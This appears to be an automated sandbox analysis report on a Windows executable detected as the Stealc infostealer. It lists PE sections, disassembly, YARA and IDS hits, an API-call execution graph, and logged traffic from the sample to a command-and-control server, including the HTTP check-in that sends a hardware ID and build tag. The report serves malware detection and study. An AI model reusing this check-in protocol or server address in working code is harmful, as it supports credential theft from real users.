File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                      Instruction
                      jmp 00007F33B8DB4B4Ah
                      pshufw mm3, qword ptr [eax+eax], 00h
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [eax+00h], ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xchg eax, ebx
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], cl
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dl
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ebx], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edi], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      pop es
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dl
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edx], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], cl
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 04ea4886087ef979847b4aebbee1d22c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2aa000 | 0x200 | 8c5a0010c3d3c9fb274cf1c84e952ce2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mljpawsw | 0x508000 | 0x1a3000 | 0x1a3000 | d7f965a6ea33d3be0e6a807ff748859f | False | 0.9949790936381265 | data | 7.954150449631776 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uqwudrny | 0x6ab000 | 0x1000 | 0x400 | 88748912fce70085855195e94e1a1b5a | False | 0.7314453125 | data | 5.708639752428155 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6ac000 | 0x3000 | 0x2200 | da7641287d3736a9a7554dbf4b77fc45 | False | 0.058363970588235295 | DOS executable (COM) | 0.6410084349610963 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-30T03:24:10.566762+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 30, 2024 03:24:09.580913067 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 03:24:09.585872889 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 30, 2024 03:24:09.585963011 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 03:24:09.586106062 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 03:24:09.590888977 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 30, 2024 03:24:10.312869072 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 30, 2024 03:24:10.312956095 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 03:24:10.342576981 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 03:24:10.347472906 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 30, 2024 03:24:10.566664934 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 30, 2024 03:24:10.566761971 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 03:24:13.696296930 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                      • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6780 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 03:24:09.586106062 CEST | 89 | OUT | GET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
Sep 30, 2024 03:24:10.312869072 CEST | 203 | IN | HTTP/1.1 200 OK
                      Date: Mon, 30 Sep 2024 01:24:10 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
Sep 30, 2024 03:24:10.342576981 CEST | 411 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH
                      Host: 185.215.113.37
                      Content-Length: 210
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 38 30 30 37 41 34 34 41 42 42 38 38 33 38 38 34 31 37 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a
                      Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="hwid"A68007A44ABB883884179------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="build"doma------AECAECFCAAEBFHIEHDGH--
Sep 30, 2024 03:24:10.566664934 CEST | 210 | IN | HTTP/1.1 200 OK
                      Date: Mon, 30 Sep 2024 01:24:10 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=



Target ID: 0
Start time: 21:24:04
Start date: 29/09/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x6d0000
File size: 1'872'384 bytes
MD5 hash: DC92CE1751A7ABFE2C6232AE8FCDD321
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1781255600.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 7.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.7%
Total number of Nodes: 2000
Total number of Limit Nodes: 24
                        execution_graph 13474 6e69f0 13519 6d2260 13474->13519 13498 6e6a64 13499 6ea9b0 4 API calls 13498->13499 13500 6e6a6b 13499->13500 13501 6ea9b0 4 API calls 13500->13501 13502 6e6a72 13501->13502 13503 6ea9b0 4 API calls 13502->13503 13504 6e6a79 13503->13504 13505 6ea9b0 4 API calls 13504->13505 13506 6e6a80 13505->13506 13671 6ea8a0 13506->13671 13508 6e6b0c 13675 6e6920 GetSystemTime 13508->13675 13509 6e6a89 13509->13508 13511 6e6ac2 OpenEventA 13509->13511 13513 6e6ad9 13511->13513 13514 6e6af5 CloseHandle Sleep 13511->13514 13518 6e6ae1 CreateEventA 13513->13518 13517 6e6b0a 13514->13517 13517->13509 13518->13508 13872 6d45c0 13519->13872 13521 6d2274 13522 6d45c0 2 API calls 13521->13522 13523 6d228d 13522->13523 13524 6d45c0 2 API calls 13523->13524 13525 6d22a6 13524->13525 13526 6d45c0 2 API calls 13525->13526 13527 6d22bf 13526->13527 13528 6d45c0 2 API calls 13527->13528 13529 6d22d8 13528->13529 13530 6d45c0 2 API calls 13529->13530 13531 6d22f1 13530->13531 13532 6d45c0 2 API calls 13531->13532 13533 6d230a 13532->13533 13534 6d45c0 2 API calls 13533->13534 13535 6d2323 13534->13535 13536 6d45c0 2 API calls 13535->13536 13537 6d233c 13536->13537 13538 6d45c0 2 API calls 13537->13538 13539 6d2355 13538->13539 13540 6d45c0 2 API calls 13539->13540 13541 6d236e 13540->13541 13542 6d45c0 2 API calls 13541->13542 13543 6d2387 13542->13543 13544 6d45c0 2 API calls 13543->13544 13545 6d23a0 13544->13545 13546 6d45c0 2 API calls 13545->13546 13547 6d23b9 13546->13547 13548 6d45c0 2 API calls 13547->13548 13549 6d23d2 13548->13549 13550 6d45c0 2 API calls 13549->13550 13551 6d23eb 13550->13551 13552 6d45c0 2 API calls 13551->13552 13553 6d2404 13552->13553 13554 6d45c0 2 API calls 13553->13554 13555 6d241d 13554->13555 13556 6d45c0 2 API calls 13555->13556 13557 6d2436 13556->13557 13558 6d45c0 2 API calls 13557->13558 13559 6d244f 13558->13559 13560 6d45c0 2 API calls 13559->13560 13561 6d2468 13560->13561 13562 6d45c0 2 API calls 
13561->13562 13563 6d2481 13562->13563 13564 6d45c0 2 API calls 13563->13564 13565 6d249a 13564->13565 13566 6d45c0 2 API calls 13565->13566 13567 6d24b3 13566->13567 13568 6d45c0 2 API calls 13567->13568 13569 6d24cc 13568->13569 13570 6d45c0 2 API calls 13569->13570 13571 6d24e5 13570->13571 13572 6d45c0 2 API calls 13571->13572 13573 6d24fe 13572->13573 13574 6d45c0 2 API calls 13573->13574 13575 6d2517 13574->13575 13576 6d45c0 2 API calls 13575->13576 13577 6d2530 13576->13577 13578 6d45c0 2 API calls 13577->13578 13579 6d2549 13578->13579 13580 6d45c0 2 API calls 13579->13580 13581 6d2562 13580->13581 13582 6d45c0 2 API calls 13581->13582 13583 6d257b 13582->13583 13584 6d45c0 2 API calls 13583->13584 13585 6d2594 13584->13585 13586 6d45c0 2 API calls 13585->13586 13587 6d25ad 13586->13587 13588 6d45c0 2 API calls 13587->13588 13589 6d25c6 13588->13589 13590 6d45c0 2 API calls 13589->13590 13591 6d25df 13590->13591 13592 6d45c0 2 API calls 13591->13592 13593 6d25f8 13592->13593 13594 6d45c0 2 API calls 13593->13594 13595 6d2611 13594->13595 13596 6d45c0 2 API calls 13595->13596 13597 6d262a 13596->13597 13598 6d45c0 2 API calls 13597->13598 13599 6d2643 13598->13599 13600 6d45c0 2 API calls 13599->13600 13601 6d265c 13600->13601 13602 6d45c0 2 API calls 13601->13602 13603 6d2675 13602->13603 13604 6d45c0 2 API calls 13603->13604 13605 6d268e 13604->13605 13606 6e9860 13605->13606 13877 6e9750 GetPEB 13606->13877 13608 6e9868 13609 6e9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13608->13609 13612 6e987a 13608->13612 13610 6e9b0d 13609->13610 13611 6e9af4 GetProcAddress 13609->13611 13614 6e9b46 13610->13614 13615 6e9b16 GetProcAddress GetProcAddress 13610->13615 13611->13610 13613 6e988c 21 API calls 13612->13613 13613->13609 13616 6e9b4f GetProcAddress 13614->13616 13617 6e9b68 13614->13617 13615->13614 13616->13617 13618 6e9b89 13617->13618 13619 6e9b71 GetProcAddress 13617->13619 13620 6e9b92 GetProcAddress GetProcAddress 
15031->15032 15033 6e7500 6 API calls 15032->15033 15034 6e1b96 15033->15034 15035 6ea920 3 API calls 15034->15035 15036 6e1ba9 15035->15036 15037 6ea8a0 lstrcpy 15036->15037 15038 6e1bb2 15037->15038 15039 6ea9b0 4 API calls 15038->15039 15040 6e1bdc 15039->15040 15041 6ea8a0 lstrcpy 15040->15041 15042 6e1be5 15041->15042 15043 6ea9b0 4 API calls 15042->15043 15044 6e1c05 15043->15044 15045 6ea8a0 lstrcpy 15044->15045 15046 6e1c0e 15045->15046 15754 6e7690 GetProcessHeap RtlAllocateHeap 15046->15754 15049 6ea9b0 4 API calls 15050 6e1c2e 15049->15050 15051 6ea8a0 lstrcpy 15050->15051 15052 6e1c37 15051->15052 15053 6ea9b0 4 API calls 15052->15053 15054 6e1c56 15053->15054 15055 6ea8a0 lstrcpy 15054->15055 15056 6e1c5f 15055->15056 15057 6ea9b0 4 API calls 15056->15057 15058 6e1c80 15057->15058 15059 6ea8a0 lstrcpy 15058->15059 15060 6e1c89 15059->15060 15761 6e77c0 GetCurrentProcess IsWow64Process 15060->15761 15063 6ea9b0 4 API calls 15064 6e1ca9 15063->15064 15065 6ea8a0 lstrcpy 15064->15065 15066 6e1cb2 15065->15066 15067 6ea9b0 4 API calls 15066->15067 15068 6e1cd1 15067->15068 15069 6ea8a0 lstrcpy 15068->15069 15070 6e1cda 15069->15070 15071 6ea9b0 4 API calls 15070->15071 15072 6e1cfb 15071->15072 15073 6ea8a0 lstrcpy 15072->15073 15074 6e1d04 15073->15074 15075 6e7850 3 API calls 15074->15075 15076 6e1d14 15075->15076 15077 6ea9b0 4 API calls 15076->15077 15078 6e1d24 15077->15078 15079 6ea8a0 lstrcpy 15078->15079 15080 6e1d2d 15079->15080 15081 6ea9b0 4 API calls 15080->15081 15082 6e1d4c 15081->15082 15083 6ea8a0 lstrcpy 15082->15083 15084 6e1d55 15083->15084 15085 6ea9b0 4 API calls 15084->15085 15086 6e1d75 15085->15086 15087 6ea8a0 lstrcpy 15086->15087 15088 6e1d7e 15087->15088 15089 6e78e0 3 API calls 15088->15089 15090 6e1d8e 15089->15090 15091 6ea9b0 4 API calls 15090->15091 15092 6e1d9e 15091->15092 15093 6ea8a0 lstrcpy 15092->15093 15094 6e1da7 15093->15094 15095 6ea9b0 4 API calls 15094->15095 15096 6e1dc6 15095->15096 15097 6ea8a0 lstrcpy 
15096->15097 15098 6e1dcf 15097->15098 15099 6ea9b0 4 API calls 15098->15099 15100 6e1df0 15099->15100 15101 6ea8a0 lstrcpy 15100->15101 15102 6e1df9 15101->15102 15763 6e7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15102->15763 15105 6ea9b0 4 API calls 15106 6e1e19 15105->15106 15107 6ea8a0 lstrcpy 15106->15107 15108 6e1e22 15107->15108 15109 6ea9b0 4 API calls 15108->15109 15110 6e1e41 15109->15110 15111 6ea8a0 lstrcpy 15110->15111 15112 6e1e4a 15111->15112 15113 6ea9b0 4 API calls 15112->15113 15114 6e1e6b 15113->15114 15115 6ea8a0 lstrcpy 15114->15115 15116 6e1e74 15115->15116 15765 6e7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15116->15765 15119 6ea9b0 4 API calls 15120 6e1e94 15119->15120 15121 6ea8a0 lstrcpy 15120->15121 15122 6e1e9d 15121->15122 15123 6ea9b0 4 API calls 15122->15123 15124 6e1ebc 15123->15124 15125 6ea8a0 lstrcpy 15124->15125 15126 6e1ec5 15125->15126 15127 6ea9b0 4 API calls 15126->15127 15128 6e1ee5 15127->15128 15129 6ea8a0 lstrcpy 15128->15129 15130 6e1eee 15129->15130 15768 6e7b00 GetUserDefaultLocaleName 15130->15768 15133 6ea9b0 4 API calls 15134 6e1f0e 15133->15134 15135 6ea8a0 lstrcpy 15134->15135 15136 6e1f17 15135->15136 15137 6ea9b0 4 API calls 15136->15137 15138 6e1f36 15137->15138 15139 6ea8a0 lstrcpy 15138->15139 15140 6e1f3f 15139->15140 15141 6ea9b0 4 API calls 15140->15141 15142 6e1f60 15141->15142 15143 6ea8a0 lstrcpy 15142->15143 15144 6e1f69 15143->15144 15772 6e7b90 15144->15772 15146 6e1f80 15147 6ea920 3 API calls 15146->15147 15148 6e1f93 15147->15148 15149 6ea8a0 lstrcpy 15148->15149 15150 6e1f9c 15149->15150 15151 6ea9b0 4 API calls 15150->15151 15152 6e1fc6 15151->15152 15153 6ea8a0 lstrcpy 15152->15153 15154 6e1fcf 15153->15154 15155 6ea9b0 4 API calls 15154->15155 15156 6e1fef 15155->15156 15157 6ea8a0 lstrcpy 15156->15157 15158 6e1ff8 15157->15158 15784 6e7d80 GetSystemPowerStatus 15158->15784 15161 6ea9b0 4 API calls 15162 6e2018 15161->15162 15163 6ea8a0 lstrcpy 15162->15163 15164 
6e2021 15163->15164 15165 6ea9b0 4 API calls 15164->15165 15166 6e2040 15165->15166 15167 6ea8a0 lstrcpy 15166->15167 15168 6e2049 15167->15168 15169 6ea9b0 4 API calls 15168->15169 15170 6e206a 15169->15170 15171 6ea8a0 lstrcpy 15170->15171 15172 6e2073 15171->15172 15173 6e207e GetCurrentProcessId 15172->15173 15786 6e9470 OpenProcess 15173->15786 15176 6ea920 3 API calls 15177 6e20a4 15176->15177 15178 6ea8a0 lstrcpy 15177->15178 15179 6e20ad 15178->15179 15180 6ea9b0 4 API calls 15179->15180 15181 6e20d7 15180->15181 15182 6ea8a0 lstrcpy 15181->15182 15183 6e20e0 15182->15183 15184 6ea9b0 4 API calls 15183->15184 15185 6e2100 15184->15185 15186 6ea8a0 lstrcpy 15185->15186 15187 6e2109 15186->15187 15791 6e7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15187->15791 15190 6ea9b0 4 API calls 15191 6e2129 15190->15191 15192 6ea8a0 lstrcpy 15191->15192 15193 6e2132 15192->15193 15194 6ea9b0 4 API calls 15193->15194 15195 6e2151 15194->15195 15196 6ea8a0 lstrcpy 15195->15196 15197 6e215a 15196->15197 15198 6ea9b0 4 API calls 15197->15198 15199 6e217b 15198->15199 15200 6ea8a0 lstrcpy 15199->15200 15201 6e2184 15200->15201 15795 6e7f60 15201->15795 15204 6ea9b0 4 API calls 15205 6e21a4 15204->15205 15206 6ea8a0 lstrcpy 15205->15206 15207 6e21ad 15206->15207 15208 6ea9b0 4 API calls 15207->15208 15209 6e21cc 15208->15209 15210 6ea8a0 lstrcpy 15209->15210 15211 6e21d5 15210->15211 15212 6ea9b0 4 API calls 15211->15212 15213 6e21f6 15212->15213 15214 6ea8a0 lstrcpy 15213->15214 15215 6e21ff 15214->15215 15808 6e7ed0 GetSystemInfo wsprintfA 15215->15808 15218 6ea9b0 4 API calls 15219 6e221f 15218->15219 15220 6ea8a0 lstrcpy 15219->15220 15221 6e2228 15220->15221 15222 6ea9b0 4 API calls 15221->15222 15223 6e2247 15222->15223 15224 6ea8a0 lstrcpy 15223->15224 15225 6e2250 15224->15225 15226 6ea9b0 4 API calls 15225->15226 15227 6e2270 15226->15227 15228 6ea8a0 lstrcpy 15227->15228 15229 6e2279 15228->15229 15810 6e8100 GetProcessHeap RtlAllocateHeap 15229->15810 15232 
6ea9b0 4 API calls 15233 6e2299 15232->15233 15234 6ea8a0 lstrcpy 15233->15234 15235 6e22a2 15234->15235 15236 6ea9b0 4 API calls 15235->15236 15237 6e22c1 15236->15237 15238 6ea8a0 lstrcpy 15237->15238 15239 6e22ca 15238->15239 15240 6ea9b0 4 API calls 15239->15240 15241 6e22eb 15240->15241 15242 6ea8a0 lstrcpy 15241->15242 15243 6e22f4 15242->15243 15816 6e87c0 15243->15816 15246 6ea920 3 API calls 15247 6e231e 15246->15247 15248 6ea8a0 lstrcpy 15247->15248 15249 6e2327 15248->15249 15250 6ea9b0 4 API calls 15249->15250 15251 6e2351 15250->15251 15252 6ea8a0 lstrcpy 15251->15252 15253 6e235a 15252->15253 15254 6ea9b0 4 API calls 15253->15254 15255 6e237a 15254->15255 15256 6ea8a0 lstrcpy 15255->15256 15257 6e2383 15256->15257 15258 6ea9b0 4 API calls 15257->15258 15259 6e23a2 15258->15259 15260 6ea8a0 lstrcpy 15259->15260 15261 6e23ab 15260->15261 15821 6e81f0 15261->15821 15263 6e23c2 15264 6ea920 3 API calls 15263->15264 15265 6e23d5 15264->15265 15266 6ea8a0 lstrcpy 15265->15266 15267 6e23de 15266->15267 15268 6ea9b0 4 API calls 15267->15268 15269 6e240a 15268->15269 15270 6ea8a0 lstrcpy 15269->15270 15271 6e2413 15270->15271 15272 6ea9b0 4 API calls 15271->15272 15273 6e2432 15272->15273 15274 6ea8a0 lstrcpy 15273->15274 15275 6e243b 15274->15275 15276 6ea9b0 4 API calls 15275->15276 15277 6e245c 15276->15277 15278 6ea8a0 lstrcpy 15277->15278 15279 6e2465 15278->15279 15280 6ea9b0 4 API calls 15279->15280 15281 6e2484 15280->15281 15282 6ea8a0 lstrcpy 15281->15282 15283 6e248d 15282->15283 15284 6ea9b0 4 API calls 15283->15284 15285 6e24ae 15284->15285 15286 6ea8a0 lstrcpy 15285->15286 15287 6e24b7 15286->15287 15829 6e8320 15287->15829 15289 6e24d3 15290 6ea920 3 API calls 15289->15290 15291 6e24e6 15290->15291 15292 6ea8a0 lstrcpy 15291->15292 15293 6e24ef 15292->15293 15294 6ea9b0 4 API calls 15293->15294 15295 6e2519 15294->15295 15296 6ea8a0 lstrcpy 15295->15296 15297 6e2522 15296->15297 15298 6ea9b0 4 API calls 15297->15298 15299 6e2543 15298->15299 
15300 6ea8a0 lstrcpy 15299->15300 15301 6e254c 15300->15301 15302 6e8320 17 API calls 15301->15302 15303 6e2568 15302->15303 15304 6ea920 3 API calls 15303->15304 15305 6e257b 15304->15305 15306 6ea8a0 lstrcpy 15305->15306 15307 6e2584 15306->15307 15308 6ea9b0 4 API calls 15307->15308 15309 6e25ae 15308->15309 15310 6ea8a0 lstrcpy 15309->15310 15311 6e25b7 15310->15311 15312 6ea9b0 4 API calls 15311->15312 15313 6e25d6 15312->15313 15314 6ea8a0 lstrcpy 15313->15314 15315 6e25df 15314->15315 15316 6ea9b0 4 API calls 15315->15316 15317 6e2600 15316->15317 15318 6ea8a0 lstrcpy 15317->15318 15319 6e2609 15318->15319 15865 6e8680 15319->15865 15321 6e2620 15322 6ea920 3 API calls 15321->15322 15323 6e2633 15322->15323 15324 6ea8a0 lstrcpy 15323->15324 15325 6e263c 15324->15325 15326 6e265a lstrlen 15325->15326 15327 6e266a 15326->15327 15328 6ea740 lstrcpy 15327->15328 15329 6e267c 15328->15329 15330 6d1590 lstrcpy 15329->15330 15331 6e268d 15330->15331 15875 6e5190 15331->15875 15333 6e2699 15333->13765 16063 6eaad0 15334->16063 15336 6d5009 InternetOpenUrlA 15340 6d5021 15336->15340 15337 6d502a InternetReadFile 15337->15340 15338 6d50a0 InternetCloseHandle InternetCloseHandle 15339 6d50ec 15338->15339 15339->13769 15340->15337 15340->15338 16064 6d98d0 15341->16064 15343 6e0759 15344 6e0a38 15343->15344 15345 6e077d 15343->15345 15346 6d1590 lstrcpy 15344->15346 15347 6e0799 StrCmpCA 15345->15347 15348 6e0a49 15346->15348 15349 6e07a8 15347->15349 15350 6e0843 15347->15350 16240 6e0250 15348->16240 15352 6ea7a0 lstrcpy 15349->15352 15355 6e0865 StrCmpCA 15350->15355 15354 6e07c3 15352->15354 15357 6d1590 lstrcpy 15354->15357 15356 6e0874 15355->15356 15393 6e096b 15355->15393 15358 6ea740 lstrcpy 15356->15358 15359 6e080c 15357->15359 15361 6e0881 15358->15361 15362 6ea7a0 lstrcpy 15359->15362 15360 6e099c StrCmpCA 15363 6e09ab 15360->15363 15364 6e0a2d 15360->15364 15365 6ea9b0 4 API calls 15361->15365 15366 6e0823 15362->15366 15367 6d1590 lstrcpy 15363->15367 
15364->13773 15368 6e08ac 15365->15368 15369 6ea7a0 lstrcpy 15366->15369 15370 6e09f4 15367->15370 15371 6ea920 3 API calls 15368->15371 15372 6e083e 15369->15372 15373 6ea7a0 lstrcpy 15370->15373 15374 6e08b3 15371->15374 16067 6dfb00 15372->16067 15376 6e0a0d 15373->15376 15377 6ea9b0 4 API calls 15374->15377 15378 6ea7a0 lstrcpy 15376->15378 15379 6e08ba 15377->15379 15380 6e0a28 15378->15380 15381 6ea8a0 lstrcpy 15379->15381 16183 6e0030 15380->16183 15393->15360 15715 6ea7a0 lstrcpy 15714->15715 15716 6d1683 15715->15716 15717 6ea7a0 lstrcpy 15716->15717 15718 6d1695 15717->15718 15719 6ea7a0 lstrcpy 15718->15719 15720 6d16a7 15719->15720 15721 6ea7a0 lstrcpy 15720->15721 15722 6d15a3 15721->15722 15722->14596 15724 6d47c6 15723->15724 15725 6d4838 lstrlen 15724->15725 15749 6eaad0 15725->15749 15727 6d4848 InternetCrackUrlA 15728 6d4867 15727->15728 15728->14673 15730 6ea740 lstrcpy 15729->15730 15731 6e8b74 15730->15731 15732 6ea740 lstrcpy 15731->15732 15733 6e8b82 GetSystemTime 15732->15733 15735 6e8b99 15733->15735 15734 6ea7a0 lstrcpy 15736 6e8bfc 15734->15736 15735->15734 15736->14688 15738 6ea931 15737->15738 15739 6ea988 15738->15739 15741 6ea968 lstrcpy lstrcat 15738->15741 